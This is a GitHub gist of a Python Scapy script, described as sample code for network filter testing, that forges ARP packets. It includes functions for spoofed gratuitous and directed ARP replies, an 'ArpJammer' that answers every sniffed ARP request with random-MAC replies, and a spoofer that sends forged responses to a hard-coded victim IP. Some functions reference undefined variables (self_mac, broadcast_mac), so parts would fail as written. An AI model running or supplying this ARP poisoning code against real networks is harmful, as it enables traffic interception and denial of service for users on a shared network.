Skip to content

Instantly share code, notes, and snippets.

@santa4nt

santa4nt/arp_scapy.py

Created February 28, 2013 19:23
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save santa4nt/5059337 to your computer and use it in GitHub Desktop.
Save santa4nt/5059337 to your computer and use it in GitHub Desktop.
Download ZIP
Some quick-n-dirty sample code and functions to manipulate ARP packets (for network filter testing).
Raw
arp_scapy.py
from scapy.all import *
# change this to your test machine's MAC address
SELF_MAC = '00:0c:29:67:22:c2'
BCAST_MAC = 'ff:ff:ff:ff:ff:ff'
# this will send a PROBE ARP request packet to the supplied IP address argument
def create_ARP_request_probe(ipaddr_to_probe):
arp = ARP(psrc='0.0.0.0', hwsrc=SELF_MAC, pdst=ipaddr_to_probe)
return Ether(dst=BCAST_MAC)/arp
# this will send a gratuitous REQUEST ARP packet, pretending to have the IP
# address set to `ipaddr_to_broadcast`
def create_ARP_request_gratuitous(ipaddr_to_broadcast):
arp = ARP(psrc=ipaddr_to_broadcast, hwsrc=SELF_MAC, pdst=ipaddr_to_broadcast)
return Ether(dst=BCAST_MAC)/arp
def create_ARP_request_directed(
ipaddr_target, # this is the target machine, set this to its actual IP address
ipaddr_src_spoof, # this is what the target machine will think this ARP packet comes from, might be spoofed
eth_dest=BCAST_MAC): # either leave as is (broadcast), or set it to the target machine's actual MAC address
arp = ARP(psrc=ipaddr_src_spoof, hwsrc=self_mac, pdst=ipaddr_target)
eth = Ether(dst=eth_dest)
return eth/arp
# similar to create_ARP_request_gratuitous, except we are using RESPONSE ARP packet
# with op code 2 (is-at)
def create_ARP_response_gratuitous(ipaddr_to_advertise):
arp = ARP(psrc=ipaddr_to_advertise, hwsrc=self_mac, pdst=ipaddr_to_advertise, hwdst=self_mac, op=2)
eth = Ether(dst=broadcast_mac)
return eth/arp
# create an unsolicited ARP RESPONSE packet to the target nachine;
# could be used to spoof a response packet RIGHT AFTER seeing a request, to pretend to be `ipaddr_to_spoof`
def create_ARP_response_directed(
ipaddr_to_spoof, # the IP address we are claiming to be, within the ARP RESPONSE packet
ipaddr_target, # the target machine's real IP address
mac_target): # the target machine's real MAC address
arp = ARP(hwsrc=SELF_MAC, psrc=ipaddr_to_spoof, hwdst=mac_target, pdst=ipaddr_target, op=2)
eth = Ether(dst=mac_target)
return eth/arp
## !!! HOW TO SNIFF ARP PACKETS (and possibly respond with SPOOFS) !!! ##
## First, some sample code (taken from http://www.craigdodd.co.uk/posts/exploiting-arp-with-python) ##
import threading
import time
from scapy.all import *
class ArpJammer(threading.Thread):
def __init__(self, pkt):
self.pkt = pkt
self.pkt_count = 10
super(ArpJammer, self).__init__()
def run(self):
a = ARP()
a.op = 2
a.psrc = self.pkt[ARP].pdst
a.hwsrc = RandMAC()
a.pdst = self.pkt[ARP].psrc
a.hwdst = self.pkt[ARP].hwsrc
p = Ether(dst=self.pkt[ARP].hwsrc) / a
for i in range(self.pkt_count):
sendp(p)
time.sleep(2)
def arp_monitor_callback(pkt):
if ARP in pkt and pkt[ARP].op == 1:
ArpJammer(pkt).start()
def sniff_with_jammer():
sniff(prn=arp_monitor_callback, filter='arp', store=0)
## End sample ##
VICTIM_IPADDR = '192.168.253.149'
def send_spoofed_ARP_response(pkt):
arp = pkt[ARP]
req_who_has = arp.pdst
req_ipaddr = arp.psrc
req_mac = arp.hwsrc
resp_spoofed = create_ARP_response_directed(req_who_has, req_ipaddr, req_mac)
#resp_spoofed.display()
sendp(resp_spoofed)
def arp_monitor_spoofer(pkt):
if ARP in pkt and pkt[ARP].op == 1: # only act on REQUEST ARP
if pkt[ARP].psrc == VICTIM_IPADDR:
send_spoofed_ARP_response(pkt)
def sniff_with_spoofer():
sniff(prn=arp_monitor_spoofer, filter='arp', store=0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment